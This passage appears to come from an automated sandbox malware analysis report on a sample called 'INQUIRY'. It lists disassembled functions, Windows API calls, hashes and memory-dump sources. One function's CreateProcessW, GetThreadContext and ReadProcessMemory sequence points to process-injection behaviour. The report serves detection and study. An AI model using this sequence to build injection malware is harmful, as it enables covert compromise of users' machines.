                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                                              • String ID:
                                                                                              • API String ID: 1372826849-0
                                                                                              • Opcode ID: e5bcc8ee0d866cb5643cc6ab4d54c6af66046972f8da7ea948df1a0d9139a1a6
                                                                                              • Instruction ID: 35c09d3e08102db1a821a47d3fbb2aedf3b11ed0ea278bc65ca70454f02efe06
                                                                                              • Opcode Fuzzy Hash: e5bcc8ee0d866cb5643cc6ab4d54c6af66046972f8da7ea948df1a0d9139a1a6
                                                                                              • Instruction Fuzzy Hash: 61012432B00B12DEDA146B7CFD82A6E73988F92761F100D36F90ADB1D1DEB08C014661
                                                                                              Function 00A798A2 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00A79548,?,?,?,?,?,00000004), ref: 00A798BB
                                                                                              • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00A79548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00A798D1
                                                                                              • CloseHandle.KERNEL32(00000000,?,00A79548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00A798D8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$CloseCreateHandleTime
                                                                                              • String ID:
                                                                                              • API String ID: 3397143404-0
                                                                                              • Opcode ID: 81716a7b8c3152720c3d9e82259be507dd2e25b21781b968e4d1fe2358334a88
                                                                                              • Instruction ID: d696e30e96ea3d69ad05b04d889dfd5ad68366c7a992c5f98cad61582f93f0a7
                                                                                              • Opcode Fuzzy Hash: 81716a7b8c3152720c3d9e82259be507dd2e25b21781b968e4d1fe2358334a88
                                                                                              • Instruction Fuzzy Hash: 1DE08632241224BBD7215BA4EC09FCA7B59EB06760F208222FB28A90E08BB1151297D8
                                                                                              Function 00A78D0D Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _free.LIBCMT ref: 00A78D1B
                                                                                                • Part of subcall function 00A32D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00A39A24), ref: 00A32D69
                                                                                                • Part of subcall function 00A32D55: GetLastError.KERNEL32(00000000,?,00A39A24), ref: 00A32D7B
                                                                                              • _free.LIBCMT ref: 00A78D2C
                                                                                              • _free.LIBCMT ref: 00A78D3E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                              • String ID:
                                                                                              • API String ID: 776569668-0
                                                                                              • Opcode ID: c56cf7ee783aa8295308e84720220828ccc4d403300e1e82c1220f1652f177a4
                                                                                              • Instruction ID: b59e3f34662b1dcd5d38506ba0b2e380587412ec7349cc2c38fab972349f50b7
                                                                                              • Opcode Fuzzy Hash: c56cf7ee783aa8295308e84720220828ccc4d403300e1e82c1220f1652f177a4
                                                                                              • Instruction Fuzzy Hash: 94E012B164160147CB34A778AE48B9313DC4F58792B24891DB40DD7187DF68F8428228
                                                                                              Function 00A1A9C3 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: CALL
                                                                                              • API String ID: 0-4196123274
                                                                                              • Opcode ID: 12f3b9b567e1da9699cfb1fc4b2dfee027e10515dcbe693f17a373e47a14e7dd
                                                                                              • Instruction ID: 855e18780c737f8d45dee38703b3c25c9419c278330b6b52eac02a292c4adf94
                                                                                              • Opcode Fuzzy Hash: 12f3b9b567e1da9699cfb1fc4b2dfee027e10515dcbe693f17a373e47a14e7dd
                                                                                              • Instruction Fuzzy Hash: BF224774609311DFCB24DF14C590AAABBF1BF95314F14896DE89A8B362D731EC85CB82
                                                                                              Function 00A14C70 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: _memmove
                                                                                              • String ID: EA06
                                                                                              • API String ID: 4104443479-3962188686
                                                                                              • Opcode ID: a8c04ebe664eeb5b2fc6974c66a753eb9ce7865699dcf8513c9d02fa3e1f04ff
                                                                                              • Instruction ID: 555ffbc029c7b32d6cb7cd048bad4d20243ecf542ad44a1db4a894c324196603
                                                                                              • Opcode Fuzzy Hash: a8c04ebe664eeb5b2fc6974c66a753eb9ce7865699dcf8513c9d02fa3e1f04ff
                                                                                              • Instruction Fuzzy Hash: 99413D71A041585BDF219B6CE961BFE7FB69B4D300F684475EC82AB286D6209DC483A2
                                                                                              Function 01DA2330 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46processCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 01DA238A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694788619.0000000001DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01DA0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_1da0000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateProcess
                                                                                              • String ID: D
                                                                                              • API String ID: 963392458-2746444292
                                                                                              • Opcode ID: d8032cd0c60c85bdcbdd1e95e32548ef73afa8e82147693fe147fc67f90273c0
                                                                                              • Instruction ID: 6bd151c5d810d55f16701c9bac0fbc7595f40d2e063f6fa0afaf44de928b3b5c
                                                                                              • Opcode Fuzzy Hash: d8032cd0c60c85bdcbdd1e95e32548ef73afa8e82147693fe147fc67f90273c0
                                                                                              • Instruction Fuzzy Hash: 34011D7191030CAFDB20EBE1CC59FFE777CBF44701F80895DAA569A180EA74E6088B61
                                                                                              Function 01DA129D Relevance: 3.4, APIs: 2, Instructions: 400processthreadCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateProcessW.KERNELBASE(?,00000000), ref: 01DA1ACD
                                                                                              • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01DA1AF1
                                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01DA1B13
                                                                                              • TerminateProcess.KERNELBASE(00000000,00000000,?), ref: 01DA1E1C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694788619.0000000001DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01DA0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_1da0000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$ContextCreateMemoryReadTerminateThreadWow64
                                                                                              • String ID:
                                                                                              • API String ID: 572931308-0
                                                                                              • Opcode ID: cda9e504f2d45f499d696161523d23a525f419a6d7e2a7c62ebf8d064aefc9a0
                                                                                              • Instruction ID: b5da93e3d89d4ddf17f247e3d9b242ac67aa07b9a3481dc9c3c18fa75cf8ae89
                                                                                              • Opcode Fuzzy Hash: cda9e504f2d45f499d696161523d23a525f419a6d7e2a7c62ebf8d064aefc9a0
                                                                                              • Instruction Fuzzy Hash: 9612CD24E24658C6EB24DF64D8507DEB232EF68300F5090E9910DEB7A5E77A4F81CF5A
                                                                                              Function 00A147D0 Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • IsThemeActive.UXTHEME ref: 00A14834
                                                                                                • Part of subcall function 00A3336C: __lock.LIBCMT ref: 00A33372
                                                                                                • Part of subcall function 00A3336C: DecodePointer.KERNEL32(00000001,?,00A14849,00A67C74), ref: 00A3337E
                                                                                                • Part of subcall function 00A3336C: EncodePointer.KERNEL32(?,?,00A14849,00A67C74), ref: 00A33389
                                                                                                • Part of subcall function 00A148FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00A14915
                                                                                                • Part of subcall function 00A148FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00A1492A
                                                                                                • Part of subcall function 00A13B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00A13B68
                                                                                                • Part of subcall function 00A13B3A: IsDebuggerPresent.KERNEL32 ref: 00A13B7A
                                                                                                • Part of subcall function 00A13B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,00AD52F8,00AD52E0,?,?), ref: 00A13BEB
                                                                                                • Part of subcall function 00A13B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00A13C6F
                                                                                              • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00A14874
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                                                              • String ID:
                                                                                              • API String ID: 1438897964-0
                                                                                              • Opcode ID: cc819cb63cf5e6d49dc247e775cdfaac25009f2355e940375cad0a179bf4cf7a
                                                                                              • Instruction ID: b641bb0d73353354205e34216a58042a4635c26e288f2a1924bd89aab1622eb4
                                                                                              • Opcode Fuzzy Hash: cc819cb63cf5e6d49dc247e775cdfaac25009f2355e940375cad0a179bf4cf7a
                                                                                              • Instruction Fuzzy Hash: 5C118CB29093019FCB00DFB9D94598ABBE8FB89750F10491BF041872B1DB70958ACB92
                                                                                              Function 00A15C99 Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,00A15821,?,?,?,?), ref: 00A15CC7
                                                                                              • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000000,?,00A15821,?,?,?,?), ref: 00A4DD73
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateFile
                                                                                              • String ID:
                                                                                              • API String ID: 823142352-0
                                                                                              • Opcode ID: 5930e498d5eda28642b9942498f147e92246bffe31f168fbef678fc5a02f380f
                                                                                              • Instruction ID: 63d56adc223326688775c1c85bdbd9ff8ddfcb04874654a04b71efbb762c6e9f
                                                                                              • Opcode Fuzzy Hash: 5930e498d5eda28642b9942498f147e92246bffe31f168fbef678fc5a02f380f
                                                                                              • Instruction Fuzzy Hash: C9018470644748FEF3204F24CC8AFA636DCAB41768F208315BBE59A1E0C6B41C958B94
                                                                                              Function 00A30DB6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00A3571C: __FF_MSGBANNER.LIBCMT ref: 00A35733
                                                                                                • Part of subcall function 00A3571C: __NMSG_WRITE.LIBCMT ref: 00A3573A
                                                                                                • Part of subcall function 00A3571C: RtlAllocateHeap.NTDLL(010D0000,00000000,00000001,00000000,?,?,?,00A30DD3,?), ref: 00A3575F
                                                                                              • std::exception::exception.LIBCMT ref: 00A30DEC
                                                                                              • __CxxThrowException@8.LIBCMT ref: 00A30E01
                                                                                                • Part of subcall function 00A3859B: RaiseException.KERNEL32(?,?,?,00AC9E78,00000000,?,?,?,?,00A30E06,?,00AC9E78,?,00000001), ref: 00A385F0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                              • String ID:
                                                                                              • API String ID: 3902256705-0
                                                                                              • Opcode ID: ce153a26075b1498d67975e369fb1a28c7085de35174be2a245afb3fdf56e480
                                                                                              • Instruction ID: 2a0c7fe95ee4bc776c3c102b5f318faf2ec6d7428e448a60f68f3879dda00001
                                                                                              • Opcode Fuzzy Hash: ce153a26075b1498d67975e369fb1a28c7085de35174be2a245afb3fdf56e480
                                                                                              • Instruction Fuzzy Hash: 5DF0A43194031966DB10BBA8ED15EDF77AC9F01351F104469F904A6982EF719A5082D1
                                                                                              Function 00A355FD Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: __lock_file_memset
                                                                                              • String ID:
                                                                                              • API String ID: 26237723-0
                                                                                              • Opcode ID: 8e7800f242558677aaa082b79faab8ca371f55d502e9b6ad0d8422c5bbff47ad
                                                                                              • Instruction ID: 152ff96a5866b4a1b747cf5bac841d3e7e212babe7cb16d2208fa434e0bf7f58
                                                                                              • Opcode Fuzzy Hash: 8e7800f242558677aaa082b79faab8ca371f55d502e9b6ad0d8422c5bbff47ad
                                                                                              • Instruction Fuzzy Hash: F301F2B1C00A08EBCF12AFBC9E0399E7B61BF90361F488115F8241B1A1EB358A11DF91
                                                                                              Function 00A353A6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00A38B28: __getptd_noexit.LIBCMT ref: 00A38B28
                                                                                              • __lock_file.LIBCMT ref: 00A353EB
                                                                                                • Part of subcall function 00A36C11: __lock.LIBCMT ref: 00A36C34
                                                                                              • __fclose_nolock.LIBCMT ref: 00A353F6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                              • String ID:
                                                                                              • API String ID: 2800547568-0
                                                                                              • Opcode ID: 4a4b9c5b1ac570cb8b89d3b6ea69eaba6481f79d95aaeb8031e9244b7980a475
                                                                                              • Instruction ID: a6add73ec7a69637aa33da2c44de849ace6108abe6d345baba9ec28e735e0520
                                                                                              • Opcode Fuzzy Hash: 4a4b9c5b1ac570cb8b89d3b6ea69eaba6481f79d95aaeb8031e9244b7980a475
                                                                                              • Instruction Fuzzy Hash: 74F09071C01B049ADB11BF7999067AD6AE06F41374F218208B424AF1C1CFBC89419F92
                                                                                              Function 00A18061 Relevance: 2.6, APIs: 2, Instructions: 54COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,?,?,?,00A1542F,?,?,?,?,?), ref: 00A1807A
                                                                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,?,?,?,00A1542F,?,?,?,?,?), ref: 00A180AD
                                                                                                • Part of subcall function 00A1774D: _memmove.LIBCMT ref: 00A17789
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide$_memmove
                                                                                              • String ID:
                                                                                              • API String ID: 3033907384-0
                                                                                              • Opcode ID: 535aa23c5fffa600a749c328c24660b8e3064d612a3e0c9bac3237734c830043
                                                                                              • Instruction ID: b22d82ae2809ebab97ef6ddb4c38c521cbba1c5cbebcda1508e8bcaae5b0ea3b
                                                                                              • Opcode Fuzzy Hash: 535aa23c5fffa600a749c328c24660b8e3064d612a3e0c9bac3237734c830043
                                                                                              • Instruction Fuzzy Hash: E501A231201118BFEB246B61DD46FBB7B6DEF89360F20802AF905CE190DE2198408661
                                                                                              Function 00A21FC3 Relevance: 1.7, APIs: 1, Instructions: 171COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 0b879618d28d49ae5dd4caee412db2c6e84d687b1d7acabd79c2c5e0da67fcbb
                                                                                              • Instruction ID: 8df84dd15dd945bae5816fcbb020e887a57d5c843eb06f2f6af31e5679496465
                                                                                              • Opcode Fuzzy Hash: 0b879618d28d49ae5dd4caee412db2c6e84d687b1d7acabd79c2c5e0da67fcbb
                                                                                              • Instruction Fuzzy Hash: 69515F31A04614EFCF14EF68CA91FAE77B6AF85310F548568F806AB392DA30ED45CB51
                                                                                              Function 00A15AEE Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00A15B96
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: FilePointer
                                                                                              • String ID:
                                                                                              • API String ID: 973152223-0
                                                                                              • Opcode ID: 44914da356dab96595c7682eca235ecbe5a13f530ca8cc7822231acceb247f62
                                                                                              • Instruction ID: 75bcf643149b9aa9552b3880b37bfc9ef2c6c782febcffe4e443f9d0e898304a
                                                                                              • Opcode Fuzzy Hash: 44914da356dab96595c7682eca235ecbe5a13f530ca8cc7822231acceb247f62
                                                                                              • Instruction Fuzzy Hash: F1313C31E08A15EFCB18DF6DC580AADB7B5FF84310F148629D81593750E770A990CB90
                                                                                              Function 00A4FCAC Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClearVariant
                                                                                              • String ID:
                                                                                              • API String ID: 1473721057-0
                                                                                              • Opcode ID: 6505c8ecc2d17abb7c40d6752f576fd40601c071afefc98e0a0a6c8db4c1d7ef
                                                                                              • Instruction ID: 70be65da0cc10dd4c376051da6d67ff154b781fea28401a3756c15fd523f39b1
                                                                                              • Opcode Fuzzy Hash: 6505c8ecc2d17abb7c40d6752f576fd40601c071afefc98e0a0a6c8db4c1d7ef
                                                                                              • Instruction Fuzzy Hash: 0F4107746043519FDB14DF14C454B5ABBE1BF85318F1988ACE89A8B362C732E885CF92
                                                                                              Function 00A14DDD Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00A14BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00A14BEF
                                                                                                • Part of subcall function 00A3525B: __wfsopen.LIBCMT ref: 00A35266
                                                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00AD52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00A14E0F
